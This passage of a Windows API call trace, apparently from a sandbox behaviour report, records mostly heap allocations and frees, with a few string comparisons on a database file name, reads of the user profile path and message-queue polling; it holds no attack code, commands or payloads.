Flags=0x0, Size=0x8) returned 0x2a71a08 [0215.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0215.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0215.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0215.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0215.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Database1.accdb", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="atabase1.accdb", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tabase1.accdb", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="abase1.accdb", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="base1.accdb", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ase1.accdb", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="se1.accdb", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e1.accdb", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.accdb", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".accdb", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0215.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0215.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0215.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0215.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0215.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0215.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0215.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0215.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0215.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0215.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0215.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0215.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0215.439] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0215.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0215.439] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0215.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0215.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0215.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72358 [0215.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0215.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0215.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0215.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0215.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0215.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0215.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0215.439] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0215.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab050 [0215.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0215.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0215.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab020 [0215.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0215.440] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0215.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0215.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0215.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0215.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0215.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0215.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0215.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0215.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0215.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854308 [0215.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0215.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0215.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0215.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0215.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0215.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0215.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721a8 [0215.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0215.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0215.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0215.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0215.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0215.441] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaed0 [0215.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0215.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab050 [0215.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0215.441] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0215.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0215.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0215.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0215.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0215.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0215.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0215.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0215.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0215.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x38545d8 [0215.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0215.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0215.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0215.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0215.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72398 [0215.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0215.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0215.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721f8 [0215.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0215.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0215.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0215.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab050 [0215.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0215.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0215.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0215.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0215.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0215.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0215.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0215.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0215.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0215.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0215.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0215.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0215.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0215.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0215.444] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0215.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0215.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0215.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0215.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0215.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0215.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0215.444] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0215.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0215.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0215.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0215.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0215.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0215.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0215.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0215.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0215.445] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0215.445] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0215.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0215.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0215.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0215.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0215.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0215.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0215.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0215.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0215.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0215.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0215.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0215.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0215.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0215.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0215.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.447] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0215.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0215.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0215.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0215.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0215.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0215.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0215.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) 